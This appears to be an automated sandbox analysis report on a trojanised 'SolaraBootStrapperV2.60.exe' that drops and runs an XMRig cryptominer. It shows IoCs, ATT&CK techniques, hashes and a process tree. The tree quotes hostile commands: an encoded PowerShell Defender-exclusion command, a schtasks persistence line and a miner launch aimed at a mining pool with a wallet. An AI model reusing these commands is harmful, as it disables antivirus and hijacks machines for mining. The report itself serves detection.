xmrig | abf82967c5b297e6027de660affa15bb4981057fdc27872f87108f18de559207

Analysis

max time kernel
149s
max time network
159s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
21/07/2024, 19:31

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

SolaraBootStrapperV2.60.exe
Size

37.0MB
MD5

a7f42133be7db82cac21ffbefc42e7e8
SHA1

90166f22006feec37866241b7f08705e5102fcb1
SHA256

abf82967c5b297e6027de660affa15bb4981057fdc27872f87108f18de559207
SHA512

6029ed3cb20469189ba5ae7dfcb233cb8fd523896e7b3804b020580d2b2a8abaf4f7a89d108739532e0b7d9019e459390aea2e9f650a7e4b13f7c9232bbe3966
SSDEEP

786432:8rQRNarpf2O+ktHJqkV0ozkTgxVVLt8GRrE7bijzsje:8rr2O+SjvzkTghLzabice

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral1/memory/276-92-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-90-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-97-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-93-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-98-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-104-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-110-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-109-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-101-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-106-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-113-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-117-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-116-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-115-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-114-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/276-102-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

pid	Process
2788	Built.exe
2668	Built.exe
2692	minerminer.exe
1224	Process not Found
2200	services64.exe
1808	sihost64.exe

Loads dropped DLL 9 IoCs

pid	Process
2608	SolaraBootStrapperV2.60.exe
2668	Built.exe
2608	SolaraBootStrapperV2.60.exe
2608	SolaraBootStrapperV2.60.exe
1224	Process not Found
3052	cmd.exe
3052	cmd.exe
2428	conhost.exe
2428	conhost.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0004000000019461-30.dat	upx
behavioral1/memory/2668-32-0x000007FEF5A60000-0x000007FEF6048000-memory.dmp	upx

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2428 set thread context of 276	2428	conhost.exe	44

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2444	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1832	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2444	powershell.exe
2664	conhost.exe
2428	conhost.exe
2428	conhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2664	conhost.exe
Token: SeDebugPrivilege	2428	conhost.exe
Token: SeLockMemoryPrivilege	276	explorer.exe
Token: SeLockMemoryPrivilege	276	explorer.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 2608 wrote to memory of 2444	2608	SolaraBootStrapperV2.60.exe	29
PID 2608 wrote to memory of 2444	2608	SolaraBootStrapperV2.60.exe	29
PID 2608 wrote to memory of 2444	2608	SolaraBootStrapperV2.60.exe	29
PID 2608 wrote to memory of 2444	2608	SolaraBootStrapperV2.60.exe	29
PID 2608 wrote to memory of 2788	2608	SolaraBootStrapperV2.60.exe	31
PID 2608 wrote to memory of 2788	2608	SolaraBootStrapperV2.60.exe	31
PID 2608 wrote to memory of 2788	2608	SolaraBootStrapperV2.60.exe	31
PID 2608 wrote to memory of 2788	2608	SolaraBootStrapperV2.60.exe	31
PID 2788 wrote to memory of 2668	2788	Built.exe	32
PID 2788 wrote to memory of 2668	2788	Built.exe	32
PID 2788 wrote to memory of 2668	2788	Built.exe	32
PID 2608 wrote to memory of 2692	2608	SolaraBootStrapperV2.60.exe	33
PID 2608 wrote to memory of 2692	2608	SolaraBootStrapperV2.60.exe	33
PID 2608 wrote to memory of 2692	2608	SolaraBootStrapperV2.60.exe	33
PID 2608 wrote to memory of 2692	2608	SolaraBootStrapperV2.60.exe	33
PID 2692 wrote to memory of 2664	2692	minerminer.exe	34
PID 2692 wrote to memory of 2664	2692	minerminer.exe	34
PID 2692 wrote to memory of 2664	2692	minerminer.exe	34
PID 2692 wrote to memory of 2664	2692	minerminer.exe	34
PID 2664 wrote to memory of 1240	2664	conhost.exe	36
PID 2664 wrote to memory of 1240	2664	conhost.exe	36
PID 2664 wrote to memory of 1240	2664	conhost.exe	36
PID 1240 wrote to memory of 1832	1240	cmd.exe	38
PID 1240 wrote to memory of 1832	1240	cmd.exe	38
PID 1240 wrote to memory of 1832	1240	cmd.exe	38
PID 2664 wrote to memory of 3052	2664	conhost.exe	39
PID 2664 wrote to memory of 3052	2664	conhost.exe	39
PID 2664 wrote to memory of 3052	2664	conhost.exe	39
PID 3052 wrote to memory of 2200	3052	cmd.exe	41
PID 3052 wrote to memory of 2200	3052	cmd.exe	41
PID 3052 wrote to memory of 2200	3052	cmd.exe	41
PID 2200 wrote to memory of 2428	2200	services64.exe	42
PID 2200 wrote to memory of 2428	2200	services64.exe	42
PID 2200 wrote to memory of 2428	2200	services64.exe	42
PID 2200 wrote to memory of 2428	2200	services64.exe	42
PID 2428 wrote to memory of 1808	2428	conhost.exe	43
PID 2428 wrote to memory of 1808	2428	conhost.exe	43
PID 2428 wrote to memory of 1808	2428	conhost.exe	43
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 1808 wrote to memory of 2164	1808	sihost64.exe	45
PID 1808 wrote to memory of 2164	1808	sihost64.exe	45
PID 1808 wrote to memory of 2164	1808	sihost64.exe	45
PID 1808 wrote to memory of 2164	1808	sihost64.exe	45
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44
PID 2428 wrote to memory of 276	2428	conhost.exe	44

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\SolaraBootStrapperV2.60.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootStrapperV2.60.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2608
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcgB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAYQB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAbQByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAcQBpACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2444
- C:\Users\Admin\AppData\Roaming\Built.exe
  "C:\Users\Admin\AppData\Roaming\Built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Users\Admin\AppData\Roaming\Built.exe
    "C:\Users\Admin\AppData\Roaming\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2668
- C:\Users\Admin\AppData\Roaming\minerminer.exe
  "C:\Users\Admin\AppData\Roaming\minerminer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\minerminer.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1240
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1832
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3052
    - - C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2200
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2428
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1808
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:2164
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:443 --user=44cYetZ659aFV3HZjALibNdHK44yBCckEb1qWMyRmw7QAhNLf7T6EvMW4p7kFA8hzQFXMK8aC1JEtGaG6zriSY1bQK4w5NH --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI27882\python311.dll

Filesize
1.6MB

MD5
bb46b85029b543b70276ad8e4c238799

SHA1
123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c

SHA256
72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0

SHA512
5e993617509c1cf434938d6a467eb0494e04580ad242535a04937f7c174d429da70a6e71792fc3de69e103ffc5d9de51d29001a4df528cfffefdaa2cef4eaf31

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
4162b659786be857ad3a85d560df0881

SHA1
06656b19ad12b63e5f33fa380be60b38bcaa3d11

SHA256
9c8411cb96199b767111db7188014d45db60ddfbab6c7ec2e7980eccdfa0c143

SHA512
f76442f92fc7e6f56e90cd482c5053196b96a6e608188b4576039c4a4c9cb21bdf7c0eaf3f4a36540cfe80b0170b428047760644e5f7e9b6e994c6f1b31b7d37

Download Submit
C:\Users\Admin\AppData\Roaming\minerminer.exe

Filesize
29.7MB

MD5
3800882a6d8e626447e53f53e14fea16

SHA1
869b6c311982df1be38ff80581e778a6234818d5

SHA256
8016e4b6bfc73f4b1b50d040aa0744126437d0c8e330af5a08bb045ed9c81449

SHA512
763932768d45f320eea86487f72b0467eadd98b406d056997adede6792187c53c811aa5335078cd6dca11f71e30374b2dd7bf18ba960607fae9c6a92178f403f

Download Submit
\Users\Admin\AppData\Roaming\Built.exe

Filesize
6.9MB

MD5
246eaa5f153e8a517a28c4f54929f938

SHA1
46202f7429538385e13a652197a3e97898bda2bd

SHA256
f702637c96f8ce308edbcc945e267054bd22a3d96430c182ebb8e534e168fa92

SHA512
e6fbe6554dfe18ae29302cb09ba9e7fa34d19b7065ae70c06c93a9e8ff25a7cf46fdc0f1df565a5e55db32c585b42a5ad24165f2a3600b6c3629f8e1619ac3df

Download Submit
memory/276-108-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

Filesize
4KB

Download
memory/276-113-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-87-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-102-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-84-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-92-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-90-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-114-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-97-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-93-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-98-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-82-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-104-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-110-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-109-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-101-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-111-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/276-115-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-106-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-116-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/276-117-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2164-95-0x00000000001C0000-0x00000000001C6000-memory.dmp

Filesize
24KB

Download
memory/2164-86-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/2664-42-0x0000000020790000-0x000000002254E000-memory.dmp

Filesize
29.7MB

Download
memory/2664-41-0x00000000001B0000-0x0000000001F6E000-memory.dmp

Filesize
29.7MB

Download
memory/2668-32-0x000007FEF5A60000-0x000007FEF6048000-memory.dmp

Filesize
5.9MB

Download